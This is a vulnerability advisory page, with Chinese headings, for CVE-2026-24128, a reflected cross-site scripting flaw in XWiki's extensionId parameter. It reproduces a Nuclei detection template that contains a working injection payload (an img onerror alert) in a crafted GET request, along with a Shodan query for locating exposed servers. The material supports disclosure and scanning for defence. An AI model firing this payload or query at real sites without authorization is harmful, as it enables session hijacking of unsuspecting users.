CVE-2026-24128: XWiki Platform Distribution Flavor Main - Cross-Site Scripting

日期: 2026-02-03 | 影响软件: 未知 | POC: 已公开

漏洞描述

XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.

PoC代码[已公开]

id: CVE-2026-24128

info:
  name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23462
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24128
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-24128
    epss-score: 0.0002
    epss-percentile: 0.04545
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: XWiki
    product: xwiki-platform-distribution-flavor-main
    shodan-query: html:"data-xwiki-reference"
  tags: cve,cve2026,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "xwiki.extension.job"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205db0b5491c2fb10e3ac074e63070f063b076384f14cb9c562459b103634f252802210087c0508287b7a36c0a3cc5e8bc56753c6081f8b2cecab1b640a150df90bdf0ce:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-24128.yaml